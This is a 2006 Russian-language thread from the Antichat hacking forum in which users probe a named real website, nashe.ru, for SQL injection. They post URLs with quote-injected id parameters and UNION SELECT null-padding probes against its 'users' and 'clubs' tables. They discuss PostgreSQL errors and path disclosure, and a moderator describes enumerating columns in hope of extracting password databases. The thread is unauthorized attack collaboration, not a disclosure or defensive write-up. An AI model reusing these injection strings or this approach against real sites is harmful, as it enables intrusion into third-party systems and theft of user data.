ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

www.nashe.ru (SQL)
  #1  
Старый 27.02.2006, 17:19
Аватар для gannibal
gannibal
Познающий
Регистрация: 24.11.2005
Сообщений: 33
Провел на форуме:
52297

Репутация: 2
Отправить сообщение для gannibal с помощью ICQ
По умолчанию www.nashe.ru (SQL)

http://www.nashe.ru/data/past/past_detail.php3?id=1'
http://www.nashe.ru/data/artists/art_detail.php3?id=1'

ну и там их куча еще..........

вообще че-нить можно замутить с этим?
 
Ответить с цитированием

  #2  
Старый 27.02.2006, 20:18
Аватар для gadjet
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418

Репутация: 23
По умолчанию

Тута скуль инъекция
http://www.nashe.ru/data/past/past_d...1,12,13,null--
но, кажись, ниче не выдет. Ругается типа:
UNION types "text" and "int4" not matched . А так - раскрытие пути. Там просто postgeSQL, а с ним я не дружу))
 
Ответить с цитированием

  #3  
Старый 27.02.2006, 20:49
Аватар для gannibal
gannibal
Познающий
Регистрация: 24.11.2005
Сообщений: 33
Провел на форуме:
52297

Репутация: 2
Отправить сообщение для gannibal с помощью ICQ
По умолчанию

мне кажется надо просто грамотно запрос составить и тогда все будет!
 
Ответить с цитированием

  #4  
Старый 27.02.2006, 20:54
Аватар для gadjet
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418

Репутация: 23
По умолчанию

Составь, тока мне привычнее иметь дело с MySQL или MSSQL, на крайний случай.
 
Ответить с цитированием

  #5  
Старый 27.02.2006, 22:19
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

эх, ребятки.. находил я уже это.. и таблицы подбирал))
ток толку не было..) там даже для форума нет базы юзеров).
 
Ответить с цитированием

  #6  
Старый 27.02.2006, 23:32
Аватар для gadjet
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418

Репутация: 23
По умолчанию

To Rebz Какую ты конструкцию использовал? А тож интересно, как там построить синтаксически правильную конструкцию.
 
Ответить с цитированием

  #7  
Старый 27.02.2006, 23:47
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

ща поищу.. ток мои запросы обычные.. =) не аткие уж идеальные -)
подобрал атрибуты _http://www.nashe.ru/data/clubs/club_detail.php3?id=66%20union%20select%20
null,null,null,null,null,null,null%20from%20clubs--

_http://www.nashe.ru/data/clubs/club_detail.php3?id=66%20union%20select%20
null,null,null,null,null,null,null%20from%20users--

полносью подобраны атрибуты:
_http://www.nashe.ru/data/dj/dj_detail.php3?id=34%20union%20select%20
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,
null,null%20from%20users--

select users,null - дает интересную ошибку.. атрибут users
Кажется сущестуют такие названия как usr_id,usr_name

таблица forum есть..

В общем, это всё что удалось раскопать.. да и уже неитнересно стало)
 
Ответить с цитированием

  #8  
Старый 28.02.2006, 02:41
Аватар для gannibal
gannibal
Познающий
Регистрация: 24.11.2005
Сообщений: 33
Провел на форуме:
52297

Репутация: 2
Отправить сообщение для gannibal с помощью ICQ
По умолчанию

ссылки которые я привел с SQl на сайте, если правильно составить запрос то что в итоге должно примерно выдавать?
 
Ответить с цитированием

  #9  
Старый 28.02.2006, 12:33
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

ошибку MySQL должно выдать..

если ты подберешь названия столбцов (атрибутов) и самих таблиц, то можно полезные вещи вытащить.. если бы базы паролей были там..) можно было их бы вытащить)
 
Ответить с цитированием

  #10  
Старый 28.02.2006, 18:38
Аватар для gadjet
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418

Репутация: 23
По умолчанию

Цитата:
ошибку MySQL должно выдать..
Там стоит PostgreSQL
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ